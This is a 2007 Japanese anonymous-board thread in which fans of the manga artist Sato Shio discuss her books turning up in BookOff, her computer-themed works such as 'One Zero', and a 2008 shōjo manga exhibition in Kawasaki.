実家に置いてあったのを、家族が勝手に売ってしまったのだと想像。

379 :花と名無しさん:2007/07/04(水) 01:02:39 ID:???0
身内とはいえ人の本を勝手に売る家族なんているかなー
本人が置いていって「勝手に処分してくれ」とかならともかく

自分は、本人が亡くなって処分された本の一冊だと思った

380 :花と名無しさん:2007/07/04(水) 01:12:22 ID:???0
>身内とはいえ人の本を勝手に売る家族

実は結構よく聞く話だったりする…
でも一冊の本にもドラマがあるんだね、きっと

381 :花と名無しさん:2007/07/04(水) 10:06:00 ID:???0
>>379
実家に置いてあった漫画を捨てられました私が通りますよ(´・ω・`)

382 :花と名無しさん:2007/07/04(水) 15:37:19 ID:???0
10年以上前に結婚して家を出た人間がいつまでも持って行かないで置いてる本とか、
模様替えの時に本棚から紙袋に移す→見えるとこから見えないとこへ移す→売り払う
って感じで、段々どっかにやられてしまう。

持ち主もそんなに大事にしてるとは限らないしね。「あんたのマンガ捨てるよ」とか
いわれてもその場で確認してなかったら、勝手にしてーとか言いそう。

383 :花と名無しさん:2007/07/04(水) 23:05:31 ID:???0
遺品をブックオフも情緒がない
せめて寂れた感じの古本屋を選んでほしい


384 :花と名無しさん:2007/07/05(木) 20:26:44 ID:???0
そういう寂れた古本屋ってのがブコフその他の新古書店により壊滅状態orz

385 :花と名無しさん:2007/07/05(木) 23:57:30 ID:???0
自分の近所でも最近随分潰れたなあ

そういう自分もブコフは便利だから利用してしまう

386 :花と名無しさん:2007/07/06(金) 00:19:35 ID:???0
そういう寂れた本屋のエロ雑誌の下から「兄弟仁義」「竜の夢その他の夢」を見つけて
狂喜乱舞したことがあったなあ…ブックオフではまずありえない出来事。

387 :花と名無しさん:2007/07/06(金) 00:38:20 ID:???0
ブコフではそういう本が(もしあれば)
大概\105で売られているという衝撃

あそこは本の価値を知らないから好きなんだが
既に持っている本まで救出したくなるのが難点だ
捨て値で売られているのは見るに忍びん

388 :花と名無しさん:2007/07/06(金) 10:09:03 ID:???0
>>387
すっごい分かる!
うちの近所のブクオフでは、佐藤先生の本は大抵100円コーナーにあって、
見ると持ってる本でも買いたくなるし、たまに買ってしまうよ

389 :花と名無しさん:2007/07/06(金) 11:39:01 ID:???0
>あそこは本の価値を知らないから好きなんだが

本に本としての価値を見い出していないから「Book off」は大嫌いなのだが、
実にしばしば掘り出し物があるのは事実
で、買ってしまうこともある
すいません

けど、売るのはいちおー古書店に行く


390 :花と名無しさん:2007/07/06(金) 19:51:57 ID:???0
本の価値を知らないと言うより最初ッから無視してるんだよな
そう言う流通最優先の業態でのしあがったんだろうし
あの規模になったらいちいちチェックすんのも無理だろうね

でも絶対数の少ない本だと、いつまでたっても¥100コーナーに
行かないのもタマにあるよね

391 :花と名無しさん:2007/07/07(土) 02:44:29 ID:???0
あそこは店鋪によって扱いが違うようだよ
通常は売れない本は一定の期間でどんどん落とすシステムになってるらしいが
ある店で目を付けていたそこそこ真っ当な値段の本を
いずれ落とすだろと待っていたけど結局いつまでたっても落とさなくて
結局最初の値段で買ったときはさわやかに負けた気持ちになった

が基本的にブコフには普通の古本屋に求めるようなロマンは求めてないんだ
ゴミの山の中から宝物をサルベージするようなロマンを求めている
だらけみたいにレア本が過剰なプレミア価格で売られている古本屋
(例えば竜の夢…が5kとか)では得られないロマンだ

392 :花と名無しさん:2007/07/16(月) 01:55:23 ID:???0
《Book off》は新しくてきれいな本を最も割よく買い取る
だからオープンすると、周辺書店で万引きが増えるそうだ

393 :花と名無しさん:2007/07/16(月) 18:59:08 ID:???0
もともと改装屋だからな

394 :花と名無しさん:2007/07/16(月) 22:32:59 ID:???0
とあるサイトで、佐藤さんがお元気でいらっしゃるという情報を見てなんかホッとした。
漫画の仕事してくれないかなぁ・・・
まぁ、媒体をどうするかは散々リピだけどね。

395 :花と名無しさん:2007/07/17(火) 03:12:34 ID:???0
そのサイトを教えて下さるわけにはいかないのでしょうか

396 :花と名無しさん:2007/07/17(火) 11:10:18 ID:???0
晒しは良くない

397 :花と名無しさん:2007/07/17(火) 13:21:08 ID:???0
検索キーワードをひとつ紹介するくらいならいいんじゃないか?


398 :花と名無しさん:2007/07/17(火) 20:08:04 ID:???0
このスレの過疎っぷりからしたら直リン貼ったって
どってことなかろう

399 :花と名無しさん:2007/07/18(水) 13:05:18 ID:???0
それは間違ってる

400 :花と名無しさん:2007/07/20(金) 00:07:09 ID:???0
>>394
検索のキーワードを少し教えてくだせえ。

401 :花と名無しさん:2007/07/20(金) 10:00:24 ID:???0
>394
わっしも知りてぇ。
教えてくだせぇ。

402 :花と名無しさん:2007/07/21(土) 11:10:23 ID:???0
>>401
「わっし」という一人称をどっかの漫画で読んだ、と思って考え続けて今朝気づいた
萩尾望都 『銀の三角』に出てた、ラグトーリンと短期間暮らしていたオッサン

佐藤さんのキャラでは誰かいたっけ?

403 :花と名無しさん:2007/07/21(土) 11:23:19 ID:???0
>>402
オッサンてw
ラグトーリンと暮らしてた頃は、まだあんちゃんくらいだったよ>タカオ

404 :花と名無しさん:2007/07/21(土) 18:03:42 ID:???0
読んだ当時の自分に戻ってしまうものかも知れないね。
402と別人の私もオッサンの言葉に何の違和感もなかったw

405 :花と名無しさん:2007/07/22(日) 05:06:45 ID:???0
あのキャラ、キャラがおっさん臭いんだよな

406 :花と名無しさん:2007/07/22(日) 06:20:32 ID:???0
どこの馬の骨とも知れないラグトーリンにひたむきなプロポーズ
してて若者らしかったけどなぁ
子供の頃って、「わし」というのは年寄が(年をとってから)使う一人称
だと思ってたけど、当の年寄は単に若い頃から使ってるだけなんだよね…

407 :花と名無しさん:2007/07/22(日) 13:24:07 ID:???0
女性でも使うし。
わっしはないけど、神追う者のおばあちゃんはわしじゃなかった?

408 :花と名無しさん:2007/07/22(日) 18:59:48 ID:???0
杉浦日向子さんのキャラにいたよね。

409 :花と名無しさん:2007/07/22(日) 19:34:18 ID:???0
わっち?花魁が使ってたね。

410 :花と名無しさん:2007/07/23(月) 11:02:41 ID:???0
子供の頃、
祖母が「わしは〜〜じゃ」ていうのは、
年寄りだからなんだと思っていたのだが。
大人になって、それは、祖母が広島出身だからだと気づいた。
広島県民は同世代でも、けっこうそんなしゃべり方を・・・。

411 :花と名無しさん:2007/07/24(火) 18:15:27 ID:???0
>>406
別に一人称が「わっし」だったからオッサンと書いたわけじゃなく、
地に足がついてる感じで青年や若者にはあんまり見えなかったから
なんとなく、嫁さんもらい損ねちゃって、ちょっと年いっちゃった人、という印象だったんで

それと、あの短命の国(星)だったら、20代そこそこでもオッサンかなー、とかね

>>407
あ、多分そうでした

そういえば、関係ないけど五代(めぞん一刻)の祖母ちゃんも「わし」だったかな?
(違ったかも。たぶん東北のほうの方言だと思ったけど)

412 :花と名無しさん:2007/07/24(火) 19:12:29 ID:???0
スレ違いだけど五代くんのばあちゃんは新潟出身で
新潟の50代以上の女性は「おれ」という一人称を普通に使う

413 :花と名無しさん:2007/07/24(火) 23:16:16 ID:???0
「わっし」というのは、ボルトとナットの間でやね。

414 :花と名無しさん:2007/07/25(水) 00:26:51 ID:???0
そらワッシャーやがな・・

いっ、言っとくけど自演じゃないからねっっ!

415 :花と名無しさん:2007/07/25(水) 01:28:41 ID:???0
コラwww

416 :花と名無しさん:2007/07/25(水) 12:41:45 ID:???0
>>412
あー「おれ」だったか、勘違いしてた。訂正ありがとう

417 :花と名無しさん:2007/07/25(水) 23:17:18 ID:???0
>>414
ツッコミ、どもです。

418 :花と名無しさん:2007/07/28(土) 00:44:49 ID:???0
1/1歩く二足歩行大型恐竜
ttp://www.k4.dion.ne.jp/~on-art/dino/walking/html/top.htm
竜騎軍を編成したら壮観だろうな

419 :名無しさん@そうだ選挙に行こう:2007/07/29(日) 05:24:11 ID:???0
中の人、操縦上手いな

ところで三宅乱丈のイムリっつう漫画の単行本が出たんだけど
やどり木を思い起こさせるような話の始まり方で面白かった



420 :花と名無しさん:2007/08/05(日) 21:50:35 ID:???0
三宅乱丈が佐藤史生っぽいってどう言う事だろう?と思っていたが、納得した。
読後感は「夢みる惑星」と近かったかな。先の展開がもの凄く待遠しい感じとか。
史生さんのもリアルタイムで読みたかったな…。

421 :花と名無しさん:2007/08/22(水) 02:34:07 ID:???0
保守

422 :花と名無しさん:2007/09/01(土) 18:20:43 ID:???O
イムリ、気になったので読んでみました。
佐藤史生の作品と世界観は似ているけど、生々しい雰囲気がありますね。
男社会の権力闘争が絡むからかな?
ひとつの作品としては面白いですが、佐藤史生作品つながりで、
読んだからちょっと期待外れでした。
でも、おすすめしてくれた方ありがとうございます。
イムリの続きも楽しみにします。

423 :花と名無しさん:2007/09/07(金) 03:27:59 ID:RPjSQWjxO
ずっと探していたアリスブックをゲットいたしました。
竜の姫君、48ページで読みごたえ充分で面白かった。
あぁ…、でもこれで佐藤史生作品読みきってしまった。
新作読みたい。
フラワーズに佐藤史生作品希望のアンケート出し続けたら、
いつか新作載るでしょうか。

424 :花と名無しさん:2007/09/07(金) 08:23:47 ID:PnSb/uGQO
>>423
フラワーズより早川のSFマガジンのほうが狙い目な希ガス
WINGSがBL臭濃くなる前の昔のままならそっちにもリクしたかったな

425 :花と名無しさん:2007/09/07(金) 22:41:25 ID:???0
ハヤカワから単行本出ると無駄に高価でなあ
ハードカバーはモチロンの事、ソフトカバーでも高い





そんな事心配する以前の問題か・・・orz

426 :花と名無しさん:2007/09/08(土) 00:24:09 ID:???0
ソフトでもハードでも、必ず買います。

427 :花と名無しさん:2007/09/08(土) 00:40:55 ID:frT24c4JO
>>426
マイティアCLのコマソンが頭の中に蘇ったではないかw

428 :花と名無しさん:2007/09/08(土) 14:02:06 ID:XMJEtn590
>426 同意
最近買った漫画に挟んであったアンケートにリクした

佐藤史生先生のなら必ず買います!!と書いた
出版関係者の皆様、お願いします<(_ _)>

429 :花と名無しさん:2007/09/08(土) 21:22:03 ID:???0
清原なつのさんも最近復活したことだし
佐藤さんにもまたマンガを描いていただきたい

単行本復刊してあとがきマンガとかでも可

430 :花と名無しさん:2007/09/08(土) 23:17:47 ID:???O
最近知った身としては復刊激希望。
ワン・ゼロすげー!まんま現代!

431 :花と名無しさん:2007/09/09(日) 01:49:19 ID:???0
あの時代にIDとパスワードが必要なんて言われても何のことか分からんかったな

432 :花と名無しさん:2007/09/09(日) 05:05:27 ID:???0
1984年から1986年か。
コンピューターなんてただ難しそうで自分には縁のないもの・・・
ぐらいの認識しかなかったw

433 :花と名無しさん:2007/09/09(日) 10:12:25 ID:???0
パソ通やってた。(86年)大学の研究室にいるやつの
BIT-NETとかuu-netとかju-netとかがうらやましかった。
当時のuu-netがインターネットになったみたい。

434 :花と名無しさん:2007/09/09(日) 10:36:46 ID:???0
佐藤さんはコンピュータが何なのかをちゃんとわかった上で描いてるから
ワンゼロは今見ても嘘っぽいと感じるところがあんまりないね

435 :花と名無しさん:2007/09/09(日) 12:03:33 ID:???0
違和感があるのは「ナウい」という言葉くらいかな。

436 :花と名無しさん:2007/09/09(日) 13:30:44 ID:???0
ワン・ゼロがすごいと思うのは、あれが雑誌に掲載された当時は
NTTさえこの世にはまだなかった、ということだ。
エミーのセリフの「電電公社のおたずね者」という部分が
コミックス掲載時に「NTT」に差し変わっていたのをよく覚えている。
これは、そんな昔に描かれたものかと驚愕する。
っていうか、「パソコン」という単語さえ、まだなかったんだよね。
番外編「打楽天」さえ、まだ携帯電話のない時代に描かれたんだよなあ。

437 :花と名無しさん:2007/09/09(日) 16:07:35 ID:???0
NTTになったのが1985年4月か。
pcのこと全然知らない私は、マイコンって通称をよく聞いた。
wiki見てみたら、パーソナルコンピューターって言葉は1984年かららしい。
ともかく今みたいに家電扱いではなかったね。
そして88年にIDOが携帯電話というか自動車電話に参入したりと、
めまぐるしく通信が変わった時代なんだなあ。

438 :花と名無しさん:2007/09/09(日) 16:10:24 ID:???O
>>436
すげえぇええ。NTTもなかったのか。
マンダラシンセサイザーの仕事をマニアックにやらせるとか、当時読んだら、絶対に理解出来なかった自信がある。
機械は独立して動くものだと思ってた。

439 :花と名無しさん:2007/09/09(日) 16:36:55 ID:???0
そんなに昔から、コンピュータに関してものすごいハイレベルの知識があるのに
未だに(今現在はどうか判らないけど)、作画はアナログオンリーらしいのも
面白いよね。今、カラーなんかアナログよりずっとデジタルは簡単なのに。
CGには興味が向かなかったのかな。
というか、佐藤さんはコンピュータを使って何をするか、何ができるかよりも
「コンピュータ」という存在そのものに一番興味を持ってる感じだけど。

440 :花と名無しさん:2007/09/09(日) 16:48:46 ID:???0
一番興味があるのって人工知能なのかなあ。
そのあたりのエッセイを書いてほしい。
絶対買うよ、ソフトでもハードでもww

441 :花と名無しさん:2007/09/09(日) 18:06:45 ID:???0
>>437
マイコンとパソコンは全然別物だよー
と思ったら、パソコンをマイコンと呼んでいた時期もあるようだね
http://ja.wikipedia.org/wiki/%E3%83%9E%E3%82%A4%E3%82%AF%E3%83%AD%E3%82%B3%E3%83%B3%E3%83%94%E3%83%A5%E3%83%BC%E3%82%BF

>>440
魔術捜し は正直やられたって思ったな
改めて振り返ってみると 伏線とか納得できるものばかりなんだけど
ファンタジー作品も多い人だけにすっかりミスリードされた。

442 :花と名無しさん:2007/09/09(日) 18:47:41 ID:???0
>>441
おお〜。
長年間違って記憶していたことが、正しくされますた。
dクス。

443 :花と名無しさん:2007/09/09(日) 22:03:50 ID:???0
>>439
>作画はアナログオンリーらしい
あれ?昔あった吉祥寺のお店で佐藤さんのカード買ったとき、
店主のM山さんが「マックで描いてます」って言ってたよ?


444 :花と名無しさん:2007/09/09(日) 22:42:15 ID:???0
オンリーかどうかはわからないけど、見た感じではアナログ塗っぽい感じだね。

まぁ個人レベルで使うPCで商用に耐えられるCG描けるようになってきたのってごくごく最近だからね。
ワンゼロの頃なんざどんだけ金積んだって無理だっただろうし
佐藤さんもお歳だし、時代が追いついくるのが遅かったって感じなんじゃないかな。

445 :花と名無しさん:2007/09/09(日) 23:20:38 ID:???0
年いった作家さんでデジタル移行してもソフトに振り回されてるだけの人多いもんね…
佐藤さんがあれでデジタルだったら結構使いこなしてるのかも

446 :花と名無しさん:2007/09/09(日) 23:39:13 ID:???0
佐藤さんがデジタルに振り回されてるのって想像できないな
普通に自作PCとか使ってそうだけどマックなのか…
マックが300万とかしてた頃に憧れていた口か
あるいはその当時からのユーザーとかかな

447 :花と名無しさん:2007/09/09(日) 23:47:01 ID:???0
Macは美しいマシンだよ。
インターフェイスも動作も無駄のない美しい生き物。
まがいもののWindows機とは違うのさ。

パングロスの作った灰色蛇がWinで、竜がMacってイメージ。

448 :花と名無しさん:2007/09/09(日) 23:52:46 ID:???0
>>447
巣にお帰り

449 :花と名無しさん:2007/09/10(月) 14:25:18 ID:???0
>>443
ああ〜、急に思い出した。
私もポストカード買ったんだった。
どこにしまったんだろう?
増山さんに貴重ですよ〜と言われた記憶が。

450 :花と名無しさん:2007/09/10(月) 21:24:20 ID:Ezy/lvv20
>449
うちは額に入れて飾っている
で、毎日『佐藤さん!新作は!!!』と思う
何時まで待ったら願いが叶うんだ OTZ

451 :花と名無しさん:2007/09/10(月) 23:07:09 ID:Nh/k85nUO
増山さん正直良い印象ないな……

あのグッズ展行った時、買ったものをレジで精算してもらおうと思ったら、
仲間っぽいおばさん達と延々話してて無視された。
何度か声かけして、やっと嫌々一人レジに来てからも、「これいくらぁ〜」とかダラダラ喋りながらやってるし、
あげくタメ口で「○円。あっ違うわぁ×円」って平然と精算間違えるし。
「あれぇ袋ない」とか、何もかもグダグダ。
お金渡しても「ありがとう」の一言もなくて、ただ金を奪うように取って、無言でお釣りトレイに乗せて、
レジ台の上にビニール袋に突っ込んだグッズ置いて、「なんでこの人、受け取らないのかしら?」って顔で黙って見てんの。
内心はぁ?と思いながらお釣りを財布にしまうと、
最後まで「ありがとう」もなしで、すっとまたおしゃべりに戻ってた。

信者に売ってやってるんだから、みたいな態度が見え見えで
あんな人と友達なのか……とちょっと失望したよ。

信者っぽくヘコヘコすればまともに対応してくれたのかね?
グッズが手に入るのは嬉しいけど、増山さんが儲けることになるなら、二度と行きたくない。

452 :花と名無しさん:2007/09/10(月) 23:16:05 ID:???0
増山さん、近所のおかんみたいだったね。
あの店はもうやらないんじゃなかった?

453 :花と名無しさん:2007/09/16(日) 01:27:15 ID:???0
魔術師さがし、登場するキャラクタたちをパソコンの中のもので
比喩できてしまうものかな?全部は難しいかもしれないけど。
例えば、「OS」と「IMEやATOKなどの言語入力」とその他のアプリみたいに。
私には難しくて、未だにビシッと全体を把握できていない。

454 :花と名無しさん:2007/09/16(日) 01:39:12 ID:???0
パソコンよりはネットワークってかんじじゃね?

455 :花と名無しさん:2007/09/16(日) 01:55:29 ID:???0
>>454
ネット全体と端末って感じで?
考えてもみなかった。
ぜひぜひ具体的な例を拝聴したいです。

456 :花と名無しさん:2007/09/16(日) 11:38:48 ID:???0
いや「比喩」とか「例」ではなく、明確な回答が作品内の終盤に出ていると思うんだけど…
逆に聞きたいんだけど453はスタンドアロンPC上での擬人化話だと思ってたの?

デジタル話に限らず、佐藤さんの話は人やマシンなど個単位での展開から、
集合意識、ネットワークといった、全体思想的なモノへと繋がってく話が多いね。
ワンゼロなんかもそうだけど。

457 :花と名無しさん:2007/09/16(日) 16:24:48 ID:???0
>>456
スタンドアロンPCって、単体のPCという意味かな?
そうかも知れない。世界的に超有能な研究所のPCなんだろか、みたいな。
だけどワンゼロと同じく、有能なPCだから(どういうわけか勝手に)外界とも繋がりがある、
という感じに考えていたかも。本当にイミワカンネですいませんw

ビシッと分からないってのは、ワンゼロを初めて読んだときもそうだった。
今はネットが当たり前にあって、理解できていないまでも概略はつかめている気になって、
無理やりにでもそれにのっけて考えることができるけど、
魔術師さがしになると難しくなってしまって。
ビシッと理解できる日なんて来ないのだろうけど、それなりにつかみたい。
意味が分からないなりにとても面白いから。
何歩も先を行く佐藤史生さんとその読者たちについて行けたらなあ、
という感じで、一度質問してみたかったのです。

458 :花と名無しさん:2007/09/16(日) 16:41:51 ID:???0
457ですけど、言わずもがななことをだらだら書いてしまってごめんなさい。

459 :花と名無しさん:2007/09/16(日) 16:43:29 ID:???0
「ワン・ゼロ」といえば、
なぜ最後にマユリがああならなければならないのか
わからなかった…。今もわからん。

460 :花と名無しさん:2007/09/16(日) 17:38:42 ID:???0
ああ、というと、トキと統合された事?教祖扱いされた事?

461 :花と名無しさん:2007/09/16(日) 20:56:35 ID:???0
>>457
オンラインRPGだと思えば分かりやすいんじゃ

462 :459:2007/09/17(月) 08:46:56 ID:???0
>>460 トキが首しめてたでしょ。あれ。

463 :花と名無しさん:2007/09/17(月) 11:09:08 ID:???0
ディーヴァに利用されるからじゃ?
のっとられるとどの道、魂は食われるみたいだし。

464 :花と名無しさん:2007/09/17(月) 12:34:41 ID:???0
>>461
あれがゲームになると内田美奈子のブームタウン辺りになるわけだよね
魔術師では研究機関のクローズドなエリアだったけど
あれだけグラフィックに凝ってるとこ見るともうこなれた技術で
一般でもオンゲライクに活用されていそうだ

現在一番近いのはセカンドライフ辺りかな…
まだまだだなー

「竜」ってなんなんだろう


465 :花と名無しさん:2007/09/17(月) 15:14:56 ID:???0
ブームタウンはどっちかっつとパソ通の進化系じゃないかな
単一プロバから共通仮想世界にダイブする感じの。
コンテンツの中にゲームも含まれてはいるだろうけど、オンラインゲームサイトとは違うような。

あもい潤のαテンションなんかもそうだけど、感覚変換して5感ごと仮想世界に持ってくやり方は
多分魔術師も同じかな。現実世界では寝たきりのルルスが「身体の動かし方知らない」って言ってるし

竜はわからんね、何かをあらわしているんだろか。

466 :花と名無しさん:2007/09/17(月) 15:24:08 ID:???0
「Second Lifeで佐藤史生先生を囲む会」を
やってみたいな。コスプレ上等でwww

467 :花と名無しさん:2007/09/17(月) 16:32:42 ID:???0
本物の竜も気になるが、
パングロスが創ったおしり顔のしゃべる飛竜が気になる
ひと腹8個はなんか解るとして、なんで4つだけ残っているのか?とか、もうそこから解らない


468 :花と名無しさん:2007/09/17(月) 22:17:35 ID:???0
>>462
えーと、魂はもうトキと合体してしまっていて体はただの抜け殻になってたから、だったような。
しかし懐かしい話だ。
昔読んだ時は、最後の戦いに入るまでは盛り上がったんだけど、結果が妙にはっきりしない
腰砕け気味という印象だった。今読むとまた違う感じがするのかな。


469 :花と名無しさん:2007/09/17(月) 22:20:31 ID:???0
>>466
それは面白いアイデアだな〜。佐藤先生好みじゃなかろうか。でも私自身はコスプレと会話のセンスに自信なし。。

470 :花と名無しさん:2007/09/17(月) 23:34:23 ID:???0
>>462
いろいろな葛藤の末に神と訣別し、人の側に立つことを選んで兄と融合したマユリの体を
いまさら神の道具として使われるのに我慢がならなかったという解釈でどう?
実際そうやって使われると負けると思ったせいでもある。
口八丁で負けなかったからいいけどねw

>>468
うん。たぶん全然違うと思うよ。
久しぶりに読み返してみたら、”金星樹”と同じテーマだったんだなぁと、今頃気がついたもの。


471 :花と名無しさん:2007/09/17(月) 23:35:25 ID:???0
>>461
オンラインRPGって、普通のRPGとは違うんでしょうね。
その差が理解できない・・・w
でも面白そうなので、もう少し考えてみます。

佐藤センセ、Second Lifeやmixiも参加なさってるのかな。
今の佐藤センセのご興味を知りたい。

472 :花と名無しさん:2007/09/18(火) 08:24:57 ID:???0
神と魔が同量に対消滅するのだよね

中身のないマユリは端末なだけだっただろうし、
端末を壊せばその場は凌ぐ事ができるのだろうが・・・
マユリを殺すのとマニのケーブルを切る(←最終手段)が同じような意味合いに感じられた。

マユリが肉体的に死ななかったとしても一つになった自我で二つの体は不要だし
端末を残しておくのは碌な事にならない ってのは鳴馬がPCから端末装置を外しまくっていたのと重なる

結局、どうなったんだろう?
ディーパと相殺されたのはるしゃなとマニと鳴馬達の魔部分で
綾切やフダマは生き延びた?
ならまだまだ人間の煩悩は続けられるのかなw


自分は、マユリとトキが統合されてマユリの体が人形みたくなってしまったのを
マニが普通ののコンピュータに戻ってしまったのをシンクロさせてしまって
「マニアックの意識はネットのどこかで何かと融合して生きているのでは?」なんで妄想を走らせておりますw

473 :花と名無しさん:2007/09/18(火) 08:29:51 ID:???0
長文スマソでした
その上、ごめ、補足

トキ・マユリの融合はアストロツインの成せる業として、
マニとベビーが実はアストロツインだとか?なんて考えて楽しんでます

474 :花と名無しさん:2007/09/19(水) 09:05:35 ID:???0
チェンジリングのマインドシップも自立思考型コンピューターなんだよね?

セフィロートとの駆け引きで「人間と思わせていた」と言ってるし
それまでは「歌う船」のような人間を使ったマインドシップかな と思っていたんだけど。

マニアックはともかく、ベビーが介在する未来はすごい可能性が渦巻いているなあ

私も佐藤さんと同じく、人間以外の知性と話がしてみたいと思う今日この頃。
リニアも宇宙ステーションも構想ができた当初の予定とは大幅に遅れたものの、なんとか実用の目処が立ったようだし
この調子で生きている内にSFだった未来がいろいろ現実になると嬉しいなあと思う

475 :花と名無しさん:2007/09/19(水) 22:36:23 ID:???0
ここってSF好きが集ってる訳じゃなさそうだな。
セカンドライフを今更話題に出すな。恥ずかしさで脱力する。

476 :花と名無しさん:2007/09/19(水) 23:53:15 ID:???0
>>475
セカンドライフが現存するネットワークコンテンツの中で最先端なのかとかそのあたりはよく知らないが
セカンドライフの話題が出たからSF素人ばかりって理論はよくわからない。

だってSFとは何の関連性もなくね? サイエンスでもなければフィクションとも関係ないし

477 :花と名無しさん:2007/09/20(木) 00:05:49 ID:???0
威張りたいだけのシッタカでしょ、面白そうな情報は何もなし。スルーがよい。

478 :花と名無しさん:2007/09/20(木) 00:08:55 ID:???0
ん、ただの荒しだからほっとけ。

479 :花と名無しさん:2007/09/20(木) 00:46:36 ID:???0
ただのゲームの話じゃん

むしろこんな雑談的スレで、しかも今時、「硬派なSFファン」を気取るやつの方が痛…
いや、ネタ…つか、釣りだよな、いくらなんでも

480 :花と名無しさん:2007/09/20(木) 10:18:37 ID:???0
>>475
恥ずかしさで脱力するのは勝手だが、
わざわざ書き込む気力があるんなら、
佐藤さん関連のハードなSFネタでも振ったらどーだ?


481 :花と名無しさん:2007/09/20(木) 21:23:35 ID:WiiDnyBs0
はー新作って何時でるのかなー
そしてまた再読。この繰り返しは精神修行のようです(涙)

482 :花と名無しさん:2007/09/22(土) 10:31:15 ID:???O
ワンゼロの続編が読みたい

483 :花と名無しさん:2007/09/22(土) 21:46:40 ID:???0
複合船シリーズ読みたい

484 :花と名無しさん:2007/09/22(土) 22:51:48 ID:???0
全集を出してほしい

485 :花と名無しさん:2007/09/22(土) 23:08:36 ID:???O
>>484
そ れ だ 。

486 :花と名無しさん:2007/09/23(日) 00:48:29 ID:???0
稀有な才能だよね。
このまま作品集もないなんて、社会的損失だ。

487 :花と名無しさん:2007/09/23(日) 02:52:36 ID:???0
必死こいて全作集めなくてもいいしね

488 :花と名無しさん:2007/09/23(日) 16:39:49 ID:???O
出すとしたら小学館かな。他で描いてたのって新書館、ハヤカワあたり?
出して欲しいよね、全集。カラー再現ならなほうれし
少々高くても買いますノシ

489 :花と名無しさん:2007/09/23(日) 17:02:56 ID:???0
少々高くても・・・に同意です。

490 :花と名無しさん:2007/09/23(日) 22:46:05 ID:???0
まったく。一応独立した作品だけど関連ありって話が結構ある気がするし。まとめて読んで関連を追いたい。

491 :花と名無しさん:2007/09/23(日) 23:30:04 ID:???0
復刊とかにリクエストしたら?

492 :花と名無しさん:2007/09/23(日) 23:46:13 ID:???0
全集出せってリクエストは難しそう。

493 :花と名無しさん:2007/09/24(月) 21:17:04 ID:???0
でも例えば夢路行全集は復刊ドットコムのリクエストから出たんじゃなかった?

しかし今の佐藤さんには懇意にしてる出版社がないのが問題かも

494 :花と名無しさん:2007/09/24(月) 21:56:24 ID:???O
やっと出たのが追悼全集なんて、
糸色 文寸 女兼 だからとりあえず小学館にでもリク出してみるかな。

495 :花と名無しさん:2007/09/25(火) 12:29:41 ID:???0
mixiのとある人の日記に、先生へのインタビューが載ってるよ
来年に川崎で行われる企画展示用だとか。

とりあえず息災なのがわかって嬉しい

496 :花と名無しさん:2007/09/26(水) 13:14:35 ID:???0
その人がmixi の日記用にインタビューしたのか??

それとも、どこかからの転載?

497 :花と名無しさん:2007/09/26(水) 13:29:28 ID:???0
ミクシとか、とある日記とか言われてもなー
転載なら再転載頼む

498 :花と名無しさん:2007/09/26(水) 13:41:16 ID:???0
mixiで「佐藤史生」と日記検索したらすぐ出てきたよ。
来年の2月、楽しみだ〜

499 :花と名無しさん:2007/09/26(水) 14:22:39 ID:???0
>>498
だから、ミクシ入ってないんだけどw
概要だけでも書けないのか?

500 :花と名無しさん:2007/09/26(水) 20:00:16 ID:xYFtWoUr0
「少女マンガパワー!」展
来年の2008年2月16日(土)から3月30日(日)
川崎市市民ミュージアムにて開催

に、佐藤さんのが出展される
その為のインタビュー

現在、インタビュー内容は転記不可だそうなので書けない

取敢えず来年行きます


501 :花と名無しさん:2007/09/26(水) 22:15:14 ID:???0
川崎か…ちょっと遠いけど行くか

502 :花と名無しさん:2007/09/26(水) 22:45:56 ID:???O
地方だから行くのは無理そうだけど、息災なのがわかって嬉しいな
巡回してくれたらもっと嬉しいんだけど

503 :花と名無しさん:2007/09/26(水) 23:09:28 ID:t8M+Dg7+0
追記

もう一箇所展示会があるかも? らしい・・・(思案中?)
金銭的問題が大きいのかも 当事者じゃないので推測だが

もともとは海外で日本少女マンガを展示していて
それが日本に来た

だ、そうです。

504 :花と名無しさん:2007/09/27(木) 00:31:49 ID:???0
>>500
d。
何を出展するんだろう。

505 :花と名無しさん:2007/09/27(木) 10:22:11 ID:???0
>>500
>現在、インタビュー内容は転記不可だそうなので書けない

mixiのメンバーだけに提供してるインタビューってことなんだろうか

506 :500:2007/09/27(木) 19:00:35 ID:RVBgwsjf0
 >505
mixiのメンバーだけに提供してるインタビューではなく
展示会前だから内容は転記不可なんだと思う

インタビューはQ&Aで簡単に書かれている それを展示用に
編集するんだろうなー と思う

507 :花と名無しさん:2007/09/28(金) 00:32:29 ID:???0
つか日記内で質問を募ったのな
その質問の答えだけ、主に質問を提供した者に向けて
先に日記で公開したという形とおもわれ

せっかく訪ねて行ってあれだけってのはないだろ

508 :花と名無しさん:2007/09/28(金) 13:15:04 ID:???0
質問者って、普通の人な訳?
どういったコミュなのかいまいち様子がつかめん。

509 :花と名無しさん:2007/09/28(金) 17:03:25 ID:???0
ちなみに展示会の面子ね

手塚治虫、わたなべまさこ、松本零士 (松本あきら) 、
石ノ森章太郎、ちばてつや、水野英子、牧美也子、
里中満智子、一条ゆかり、池田理代子、美内すずえ、
竹宮惠子、山岸凉子、萩尾望都、佐藤史生、
陸奥A子、くらもちふさこ、吉田秋生、岩館真理子、
岡野玲子、CLAMP、よしながふみ、今市子
(計23人/デビュー順)

予算やツテ、許諾の問題などで以上になったとか。
確かに秋田書店系から一人欲しかったところだな。

510 :500:2007/09/28(金) 19:25:38 ID:TvbnRN330
>508
日記での質問者は普通の人々
コミュはズバリ『佐藤史生』コミュです

511 :花と名無しさん:2007/09/29(土) 02:47:24 ID:???0
VIP板でスレ立てしたくなる。ワン・ゼロあたりを題材に。
しかし文章に自信がないから空想で終わる。
若いファンが増えたら、新作とまでは行かなくとも作品集を期待できないかなあ。

512 :花と名無しさん:2007/09/29(土) 02:50:24 ID:???0
百鬼の衆、ついてこいってか?

513 :花と名無しさん:2007/09/29(土) 10:01:29 ID:???0
いや、vipperは「敵に回すと恐ろしいが、味方にすると頼りない」連中だから
百鬼の衆とは違うだろw

514 :花と名無しさん:2007/09/29(土) 15:11:11 ID:???0
>513
>敵に回すと恐ろしいが、味方にすると頼りない
これはvipじゃなくて2ちゃんねらー全般だろ。
vipperは「敵に回すと恐ろしいが、味方にすると迷惑」の方

515 :花と名無しさん:2007/09/29(土) 19:03:05 ID:???0
そんな2ちゃんねらやビパーたちでも、
自分にルシャナぐらいの妖力があったらやるんだけどなw
短期間でも盛り上がれば、作品集発刊か絶版を復刊するぐらいの
